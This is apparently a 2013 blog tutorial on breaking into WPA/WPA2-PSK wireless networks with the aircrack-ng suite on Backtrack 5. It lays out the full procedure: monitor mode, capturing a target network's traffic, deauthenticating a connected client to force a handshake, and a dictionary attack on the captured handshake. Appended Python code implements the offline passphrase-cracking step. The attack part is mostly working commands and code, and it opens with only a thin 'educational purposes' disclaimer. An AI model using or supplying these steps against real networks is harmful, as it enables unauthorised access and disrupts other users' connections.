
Saturday, August 17, 2013

How to Hack a WPA/WPA2 encrypted wireless Network with Backtrack 5 for WPS disabled Access Points

Hacking a WPA/WPA2 encrypted network when the access point has WPS disabled

Caution: The contents below may be used only for educational purposes and only against networks you own or are authorised to test. Anyone who uses them for illegal purposes is responsible for the outcome themselves.


         Previously, I posted on Hacking a WPA/WPA2 wireless network with Reaver. Reaver is a great method for getting into a WPA/WPA2 network, but it does not attack WPA itself: it brute-forces the WPS PIN, so it only works if the access point has WPS enabled. If WPS is disabled, Reaver cannot help you with that access point. So in this tutorial, I'll show you how to attack a WPA/WPA2 encrypted wireless network whose access point has WPS disabled. I've also posted a tutorial on WEP in Hacking a WEP Network with Backtrack 5.

        So, what we're going to do in this tutorial is capture packets from the targeted AP (Access Point) until we have captured a WPA handshake (the 4-way handshake that is exchanged when a client connects). Once we have a handshake, we run a dictionary attack against it. A dictionary attack means taking a list of probable passwords (a wordlist) and testing each one; because the handshake contains enough material to check a candidate passphrase, every test happens offline on your own machine and the AP never sees it. There are lots of wordlists out there; search for them on Google. Be patient and, if the passphrase is in your list, you'll get it.

  First Things First

        First, you will need a wireless network adapter that supports monitor mode and packet injection. You can see a list of such compatible wireless adapters in my previous post Compatible Wireless Adapters. If you already own a wireless adapter and want to test whether it supports packet injection, see my post on Testing Compatibility of Wireless Adapter.
       You will also need Backtrack 5. You will need to create a bootable Live USB/DVD to boot Backtrack 5; I have demonstrated that in my post Hacking a WPA/WPA2 wireless network with Reaver.

Let's Get Started

       After you're all set, let's get started and boot Backtrack 5. After booting up Backtrack, open a terminal and type in:

      This command will show you the list of network interfaces on your PC. Note the name of your wireless interface; in most cases it is "wlan0". Now we need to put the adapter into monitor mode. To enable monitor mode, type:

airmon-ng start wlan0

       Once monitor mode is enabled, your adapter passes every 802.11 frame it hears on the channel up to you, without associating with any network, so you can capture other networks' traffic and inject frames into it. Also note that on Backtrack 5, airmon-ng creates a new virtual interface for this and names it "mon0" (newer versions of aircrack-ng rename the interface to "wlan0mon" instead; use whatever name airmon-ng prints). If airmon-ng warns that processes such as NetworkManager could cause trouble, stop them first or they may knock the adapter out of monitor mode. Now let's look at all the access points around you. Type:

airodump-ng mon0

      Entering this command makes your adapter hop channels and list all the networks it can hear. Keep scanning until your target access point appears, then stop by pressing Ctrl+C. airodump-ng shows a lot of information about each access point; note the BSSID, the channel number and the ESSID, which we will use in the next command, and check that the ENC column says WPA or WPA2 and the AUTH column says PSK (a network using 802.1X/enterprise authentication has no pre-shared key to recover with this method). Now all we need to do is capture a WPA handshake from the AP. So we start airodump-ng again, locked to the AP's channel and filtered on its BSSID, and write the packets to a file:

airodump-ng -c (channel no.) --bssid (bssid of victim) -w (o/p filename) mon0

      After entering the above command, it will start capturing packets from the AP and writing them to a file named after your prefix (airodump-ng appends a sequence number, so "-w capture" produces capture-01.cap). The handshake is only sent when a client connects, so to capture it we need a client that is already connected to the AP and force it to reconnect by deauthenticating it. Wait until a station/client appears in the lower part of the airodump-ng window; sometimes it takes a little time for a station to show up. Once a station shows up, keep airodump-ng running, open a new terminal and start a deauthentication attack against that station by typing in:

aireplay-ng -0 5 -a (bssid of victim) -c (mac address of station/client) mon0

      After we enter the above command, aireplay-ng will send five bursts of deauthentication frames to the client, spoofed as coming from the AP. The client drops off and usually reconnects within seconds, and that reconnection is the handshake we want. It may take a few attempts; be patient, rerun the command if needed, but do not flood the client with hundreds of deauths, as it is a denial of service against that user and some clients simply give up reconnecting. When it works, a message "WPA handshake: (bssid)" appears in the top right corner of your airodump-ng window. I've shown a snapshot of how it looks below.

       Now that we have obtained a WPA handshake, the next step is to run a dictionary attack on the capture file. For a dictionary attack, we'll need a wordlist, which you can find all over the internet. Open a new terminal and type "ls" to see the files in your current directory (the directory is /root by default). Note the name of your capture file. If you want to confirm the handshake was really captured before spending time on the attack, run "aircrack-ng (capture filename)" with no wordlist: it lists the networks in the file and shows "(1 handshake)" next to those that have one. Then start the dictionary attack by typing in:

aircrack-ng -w (path to wordlist file)  (capture filename)

         If you get confused about how to enter the path to the wordlist file, type "aircrack-ng -w " and drag the file into the terminal. If the capture contains several networks, aircrack-ng will ask which one to attack; you can also pass "-b (bssid of victim)" to select it directly. Once you hit Enter, it derives the key for every word in the wordlist and checks it against the handshake. If your wordlist contains the correct passphrase, it will be recovered. A snapshot of how it looks is given below:

 So this is how you attack a WPA/WPA2-PSK network with a dictionary attack. This method works against any WPA/WPA2 network that uses a pre-shared key, provided that your wordlist contains the exact passphrase.
         Now, here's the sad part. Your wordlist must contain the exact passphrase; there is no partial credit, and because each candidate has to go through 4096 rounds of PBKDF2 before it can be checked, a CPU only tests a few thousand words per second, so a long, random passphrase is out of reach no matter how large your wordlist is. It can be frustrating. But there is a huge collection of wordlists out there; try them out, and be patient with it. Good luck!!
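To show what aircrack-ng is actually doing with that handshake, here is an added example (my own illustration, not code from the original post or from the aircrack-ng project). It derives the PMK from a candidate passphrase with PBKDF2, expands it into the PTK with the 802.11i PRF, and recomputes the MIC over EAPOL message 2 of the 4-way handshake; a match means the candidate is the network's passphrase. The SSID, MAC addresses, nonces and the EAPOL frame are all constructed here for the demonstration, not taken from a real capture; the "captured" frame is built by signing it with an assumed passphrase so the attacker half of the code has something to recover.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# --- Constructed sample data (assumptions for this example, not from a real capture) ---
SSID = b"HomeNet"                        # assumed network name
AP_MAC = bytes.fromhex("001122334455")   # assumed BSSID (authenticator)
STA_MAC = bytes.fromhex("66778899aabb")  # assumed client MAC (supplicant)
ANONCE = bytes(range(32))                # constructed AP nonce from message 1
SNONCE = bytes(range(32, 64))            # constructed client nonce from message 2
TRUE_PASSPHRASE = "correct horse battery"  # assumed PSK used to build the sample handshake

MIC_OFFSET = 81   # EAPOL header (4) + descriptor fields before the Key MIC (77)
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_zeroed_mic: bytes, key_version: int) -> bytes:
    """Key MIC: HMAC-MD5 for key descriptor version 1 (WPA/TKIP), HMAC-SHA1 for version 2 (WPA2/CCMP)."""
    digestmod = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, eapol_frame_zeroed_mic, digestmod).digest()[:MIC_LEN]


def build_message2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Constructed EAPOL-Key message 2 (RSN descriptor, key info 0x010a = version 2, pairwise, MIC set)."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def make_sample_capture() -> bytes:
    """Play the role of the client: sign message 2 with the true passphrase, as a real capture would contain."""
    pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, build_message2(SNONCE), key_version=2)
    return build_message2(SNONCE, mic)


def crack_handshake(ssid: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
                    eapol_frame: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: return the candidate whose derived KCK reproduces the captured MIC."""
    key_version = int.from_bytes(eapol_frame[5:7], "big") & 0x07   # low 3 bits of Key Information
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:       # WPA-PSK passphrases are 8 to 63 characters
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, key_version), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    frame = make_sample_capture()
    # Constructed wordlist; in practice pass open("wordlist.txt") as the iterable.
    words = ["password", "12345678", "short", "correct horse battery", "letmein12"]
    print("recovered:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame, words))
```

The MIC check needs only the two MAC addresses, both nonces and one MIC-bearing EAPOL frame, which is why a single captured handshake is enough and why the AP is never contacted during the attack. The 4096 PBKDF2 rounds per candidate are the cost that makes wordlist quality matter: the loop here runs a few hundred candidates per second in pure Python, and aircrack-ng is faster only by constant factors, not by skipping that work.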

Please leave a comment below and if you have any problems regarding this, feel free to ask in the comment section.